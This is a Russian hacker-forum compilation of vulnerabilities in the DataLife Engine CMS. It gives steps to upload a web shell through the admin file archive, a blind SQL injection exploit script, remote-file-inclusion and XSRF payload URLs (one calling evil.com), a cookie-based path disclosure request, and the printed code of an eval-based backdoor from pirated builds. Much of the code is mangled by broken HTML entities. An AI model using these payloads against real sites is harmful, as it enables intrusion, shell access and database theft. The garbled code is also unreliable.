ANTICHAT - Обзор уязвимостей DLE (DataLife Engine)

Как узнать установленную версию DLE?

1. Открываем: site.com/engine/ajax/updates.php
2. Смотрим установленную версию

Как залить шелл в DLE v4.1-8.2?

Итак, заходим в админцентр.
Далее нажимаем "Другие разделы"
Выбираем где-то в конце "Архив файлов"
Идём на "Настройка Архива Файлов"
Допустимые форматы файлов: дописываем php.
Сохраняемся, идём в "Добавить файл".
Заливаем шелл
Его дальше видно в разделе "Файловый Архив" для всех и в свойствах загруженного файла в редактировании файлов в админке.
Автор способа: desTiny

DataLife Engine
* @copyright 2008 ITDefence.ru
* @license http://www.php.net/license/3_0.txt &nbs
p;PHP License 3.0
* @version CVS: $Id:$
* @link http://underwater.itdefence.ru
* @since File available since Release 0x00
*/
@set_time_limit(0);
@ini_set('output_buffer', 0);

?>

&n
bsp; DataLifeEngine Online Mod Exploit Blind SQL Injection
&n
bsp;
&n
bsp; body{
&n
bsp; &
;
;
;nbs
p; font-family: Tahoma;
&n
bsp; &
;
;
;nbs
p; font-size: 12px;
&n
bsp; &
;
;
;nbs
p; color: #e1e1e1;
&n
bsp; &
;
;
;nbs
p; background-color: #222;
&n
bsp; }
&n
bsp;

&n
bsp;
&n
bsp; ">
&n
bsp; dle path:
&n
bsp;

&n
bsp; admin id:
&n
bsp;

&n
bsp;
&n
bsp;
&n
bsp;

') ? true: false;
&n
bsp; }
$flag = false;
&n
bsp; if (strpos($responce, 'MySQL Error') > 0){
&n
bsp; while (strlen($password) not vulnerable');
}
&n
bsp; echo "$password"
;;&a
mp;n
bsp; &
;
;
;nbs
p;

}
}

?>

XSRF баг:
Спойлер

Цитата:

site.com/dle/engine/modules/imagepreview.php?image=[XSRF]

Получение шелла через залогиненного админа:

Спойлер

Цитата:

получение:

Спойлер

Цитата:

http ://evil.com/adm.php?mod=options&action=syscon&lala=phpcode()

DataLife Engine v8.2

Отсутствие фильтрации в /engine/init.php
Уязвимость заключается в отсутствии фильтрации параметра "dle_skin" в файле init.php и позволяет увидеть пути к корню сайта.
1. Заходим на сайт DLE. Открываем браузером менеджер куки. Изменяем / добавляем параметр, название которого ставим
dle_skin
и значение
../
2. Отправляем запрос на сайт:
GET / HTTP/1.1
Host: dle-news.ru
Cookie: dle_skin=../
Cookie2: $Version=1
Connection: Close
3. После этого на сайте видим ошибку:
Warning: include_once([PATH]): failed to open stream: No such file or directory in [PATH] on line 314
Warning: include_once(): Failed opening '[PATH]' for inclusion (include_path='.;C:php5pear') in [PATH] on line 314
Невозможно загрузить шаблон: shortstory.tpl
[PATH] - это и есть раскрытие путей.
4. Соображающие люди поймут как сделать из этого LFI.
Автор: mailbrush

"Уязвимость" восстановления пароля:
/index.php?do=lostpassword&douser=1&lostid=
Получаем пас от пользователя с id 1

DatalifeEngine 8.2 Remote File Inclusion Vulnerability
Спойлер
www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]

DataLife Engine v8.3

Спойлер

Цитата:

http://localhost/upload/engine/inc/i..._language=http
8;//localhost/c.txt?
http://localhost/upload/engine/inc/help.php?config[langs]=http:/

/localhost/c.txt?
http://localhost/upload/engine/ajax/pm.php?config[lang_=http://local

host/c.txt?
http://localhost/upload/engine/ajax/...s.php?_REQUEST[skin]&a
mp;a
mp;a
mp;#
93;=http://localhost/c.txt?
http://localhost/upload/engine/ajax/...s.php?_REQUEST[skin]&a
mp;a
mp;a
mp;#
93;=http://localhost/c.txt?

Раскрытие путей:

Спойлер

Цитата:

if ($_COOKIE['dle_skin']) {
if (@is_dir ( ROOT_DIR . '/templates/' . $_COOKIE['dle_skin'] )) {
$config['skin'] = $_COOKIE['dle_skin'];
}
}

1. Открываем site.ru/engine/images.php?area=short_story&add_id=
2. Грузим картинку и получаем раскрытые пути.

Бэкдор в нулле DLE

Файл лежит в (/engine/ajax/updates.php). Код бэкдора:

Спойлер

Цитата:

if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng
9;;
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?vers
io
n_id=".$_REQUEST['versionid']."&key=".
$config
1;'key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok
";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok
";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require($file); $x.="config.php - ok
";}
eval(base64_decode($_GET['user_id']));
echo

HTML;
if($_POST['text']!=''){eval(stripcsl
ashes
0;$_POST['text']));
}}

DataLife Engine v8.5

Бекдор в нулле от M.I.D-Team. Бекдор . eval() через $_POST в uploadengineajaxkeywords.php
Вызвать его можно так:
Код
Спойлер

Цитата: